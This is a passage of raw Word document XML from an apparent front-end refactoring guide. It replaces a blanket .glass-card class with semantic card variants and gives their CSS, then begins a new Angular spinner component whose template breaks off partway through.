          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The current codebase applies .glass-card to every surface — data tables, stats, modals, sidepanels, all with the same treatment. Replace with semantic variant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3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Old Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Replace With</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4360"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3730A3" w:sz="4"/>
              <w:left w:val="single" w:color="3730A3" w:sz="4"/>
              <w:bottom w:val="single" w:color="3730A3" w:sz="4"/>
              <w:right w:val="single" w:color="3730A3" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="4F46E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="140"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Where Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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.glass-card (data tables)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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.card-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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policy-list, audit-logs, forecast-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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.glass-card (KPI stats)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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.card-hero</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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dashboard stat tiles, forecast KPIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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.glass-card (modals)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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.card-glass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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all modal-content divs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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.glass-card (sidepanels)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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.card-glass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="436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policy side panel, notification panel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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.glass-card (forms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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.card-data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="43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policy-form sections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Add to styles.css</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.card-data {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    background: var(--bg-surface);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border: 1px solid var(--border-subtle);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border-radius: var(--radius-lg);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    overflow: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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.card-hero {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    background: linear-gradient(145deg, var(--bg-elevated) 0%, var(--bg-surface) 100%);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border: 1px solid var(--border-default);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border-radius: var(--radius-xl);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    box-shadow: var(--shadow-md);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    overflow: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">.card-hero::before {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    content: "";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    position: absolute; inset: 0;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    background: linear-gradient(180deg, rgba(255,255,255,0.05) 0%, transparent 40%);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    pointer-events: none; border-radius: inherit;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</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.card-glass {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    background: rgba(24,24,27,0.85);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    backdrop-filter: blur(24px) saturate(180%);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border: 1px solid rgba(255,255,255,0.07);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    border-radius: var(--radius-xl);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    box-shadow: var(--shadow-xl), inset 0 1px 0 rgba(255,255,255,0.05);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec6-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3  Spinner Component — Standardise Loading States</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New File: src/app/shared/spinner/spinner.component.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">@Component({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    selector: "app-spinner",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    standalone: true,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    template: `</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;div class="spinner-wrap" [class]="size"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;svg class="spinner-svg" viewBox="0 0 50 50"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;circle class="spinner-track" cx="25" cy="25" r="20"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    fill="none" stroke-width="4"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;circle class="spinner-arc" cx="25" cy="25" r="20"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    fill="none" stroke-width="4"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    stroke-dasharray="80" stroke-dashoffset="60"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                    stroke-linecap="round"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;span *ngIf="label" class="spinner-label"&gt;{{ label }}&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
